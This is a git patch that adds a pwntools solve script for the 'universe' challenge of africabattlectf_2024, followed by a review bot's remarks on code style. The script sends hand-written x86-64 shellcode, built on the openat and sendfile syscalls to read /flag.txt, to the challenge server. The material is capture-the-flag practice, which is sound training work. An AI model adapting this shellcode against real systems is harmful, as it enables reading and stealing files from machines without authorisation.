From c9a6e41075403b00a7edc29b54f0fb0238669dd9 Mon Sep 17 00:00:00 2001
From: jc
Date: Tue, 22 Oct 2024 13:56:12 +0300
Subject: [PATCH] solve script

---
 africabattlectf_2024/universe/a.py | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 africabattlectf_2024/universe/a.py

diff --git a/africabattlectf_2024/universe/a.py b/africabattlectf_2024/universe/a.py
new file mode 100644
index 0000000..88a91fb
--- /dev/null
+++ b/africabattlectf_2024/universe/a.py
@@ -0,0 +1,27 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./universe", checksec=False)
+# r = process()
+r = remote("challenge.bugpwn.com", 1004)
+
+# openat + sendfile
+shellcode="""
+lea rsi, [rdx+30]
+xor rdx, rdx
+xor r10, r10
+add ax, 257
+syscall
+mov rsi, rax
+mov al, 40
+shr edi, 255
+add r10b, 255
+syscall
+"""
+shellcode = asm(shellcode)
+shellcode += b"/flag.txt\0"
+shellcode += b"\x90"*(4096-len(shellcode))
+r.sendline(shellcode)
+
+r.interactive()
\ No newline at end of file
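Review bot: `target` is bound on the `context.binary = target = ELF("./universe", checksec=False)` line but never referenced again, and `# r = process()` is commented-out code rather than a comment; keep only `context.binary = ELF("./universe", checksec=False)` and either drop the dead line or turn it into a real local/remote switch. The padding expression `b"\x90"*(4096-len(shellcode))` silently yields `b""` when the payload exceeds 4096 bytes, so the length assumption should be made explicit, e.g. `assert len(shellcode) <= 4096, "payload exceeds buffer"` before the padding line. The file also has no module docstring; a one-line header naming the challenge (`"""Solve script for the africabattlectf_2024 'universe' challenge."""`) and a short comment on the register state the assembly assumes at entry would make the script readable to someone who did not write it. The hunk is the whole new file, so there is no enclosing function.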